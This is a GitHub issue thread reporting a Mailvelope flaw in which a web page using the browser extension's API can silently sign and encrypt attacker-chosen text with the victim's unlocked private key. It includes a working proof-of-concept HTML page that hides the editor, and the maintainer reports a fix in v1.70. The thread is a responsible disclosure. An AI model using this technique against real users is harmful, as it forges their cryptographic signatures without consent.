### ISSUE TITLE
API allows to sign any message without user interaction

### ISSUE THREAD

**Issue by lphooge** [mailvelope/mailvelope#484]
Prerequisites:
- Control over a domain with the mailvelope api enabled
- an existing keyring with a private key in the victims mailvelope
- an public key for the recipient in the victims mailvelope
- the key must already be  unlocked (otherwise a dialog will pop up).

So, nothing a mail provider (or someone breaking into their infrastructure) could not achive.

Example Code:

```
<!DOCTYPE html>
<html>
	<head>
		<script>
		var recipient = "mallory@washingmachine-discount.de"; // any adress for wich a public key is available
		var keyring_name = 'mail.genericmailprovider.com'; // an existing keyring
		var text_to_sign = "yes, I want to buy that washing machine!"; // anything you want signed
		
		window.addEventListener('mailvelope', load, false);
	
		function load() {
			mailvelope.getKeyring(keyring_name).then(function(keyring) {
				var options = {
					predefinedText: text_to_sign, 
					signMsg: true
			    };
		    	mailvelope
		    		.createEditorContainer('#container', keyring, options)
		    		.then(function(editor){
	    				editor.encrypt([recipient])
	    					.then(function(armored){
	
	        					// get encrypted and signed text
	        					document.getElementById('output').innerHTML = armored;
	
	        					// remove editor
	        					var c = document.getElementById('container');
	        					c.parentNode.removeChild(c);
	    					});
		    			});
		    		});
		}
		</script>
	</head>
	<body>
		<div id="container" style="display:none"></div>
		<pre id="output"></pre>
	</body>
</html>
```

**Comment by toberndo** [comment]
That's a security issue, thanks for reporting. I'm working on the following fix: if the user doesn't do any interaction on the editor (textarea, attachments...), the encrypt method will trigger a confirmation popup and will only succeed if user confirms.

**Comment by toberndo** [comment]
Fixed with v1.70
